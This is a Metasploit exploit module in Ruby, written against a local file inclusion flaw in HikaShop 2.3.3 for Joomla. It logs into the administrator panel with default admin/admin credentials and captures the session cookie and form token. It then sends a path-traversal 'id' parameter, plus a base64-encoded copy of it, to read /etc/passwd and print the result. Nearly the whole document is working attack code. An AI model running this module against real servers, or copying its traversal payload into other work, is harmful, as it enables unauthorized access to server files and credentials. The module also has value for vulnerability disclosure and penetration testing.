
HikaShop LFI msf module

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
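class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata plus the options a user sets before running it.
  #
  # @param info [Hash] metadata merged by Msf::Exploit::Remote#initialize
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HikaShop - LFI poc for authenticated users',
      'Description' => %q{
                HikaShop 2.3.3 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', {} ]],
      'DefaultTarget'  => 0,
      # Framework convention is "Mon D YYYY"; the original '03.01.2015' is
      # ambiguous between day-first and month-first.
      'DisclosureDate' => 'Jan 3 2015'))

    # FAILPATTERN is registered but not consulted anywhere in #exploit.
    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)
  end

  # No fingerprinting is implemented; report that the state is unknown
  # instead of returning nil from an empty method.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    Exploit::CheckCode::Unknown
  end

  # Returns the first run of 32 hex characters found in +my_string+, or nil
  # when there is none. Used below to pull the login form token out of the
  # page body; note it is *any* 32-hex run, not specifically the token input.
  #
  # @param my_string [String] text to search
  # @return [String, nil]
  def fetchMd5(my_string)
    my_string[/[0-9a-fA-F]{32}/]
  end

  # Three HTTP round trips: GET the administrator login page for the session
  # cookie and form token, POST the credentials, then GET the HikaShop edit
  # view with a path-traversal 'id' value and print the raw response body.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when a request gets no response
  def exploit
    uri = normalize_uri(target_uri.path, 'administrator', 'index.php')

    # 1st: fetch the login page. send_request_cgi returns nil when no
    # response arrives, so check that before touching headers.
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri
    })
    fail_with(Failure::Unreachable, "[-] Failed with 1st request") unless req1
    cookies = req1['set-cookie']

    print_status("[+] Resp code: " + req1.code.to_s)
    # cookies may be nil if the server sent no Set-Cookie; to_s keeps the
    # concatenation from raising.
    print_good("[+] Cookie(s) : " + cookies.to_s)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    token = nil
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : " + token.to_s)
    else
      # Execution continues; the POST below then carries an empty-string key.
      print_status("[-] Token not found")
    end

    # 2nd: authenticate with the cookie and token from step 1. The 'return'
    # value is a fixed base64 blob the original author supplied; it appears
    # to encode the same com_hikashop edit URL used in step 3 — not decoded here.
    print_status("[+] 2nd request (post with auth)")

    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'cookie'    => cookies,
      'vars_post' => {
        'username'  => datastore['USERNAME'],
        'passwd'    => datastore['PASSWORD'],
        'option'    => 'com_login',
        'task'      => 'login',
        'return'    => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
        token.to_s  => 1
      }
    })
    fail_with(Failure::Unreachable, "[-] No response to login request") unless auth

    # Only the status code is reported; a failed login is not detected here.
    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd: request the edit view with the traversal 'id' and print the body.
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => uri,
      'vars_get' => {
        'option' => 'com_hikashop',
        'ctrl'   => 'view',
        'task'   => 'edit',
        'id'     => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
      },
      'cookie'   => cookies
    })

    fail_with(Failure::Unknown, "[-] Cannot exploit it :C") unless xpl

    print_good("[+] 3rd response code: " + xpl.code.to_s)
    print_good("[+] 3rd (full) response body:")
    print_status(xpl.body)
  end # exploit

end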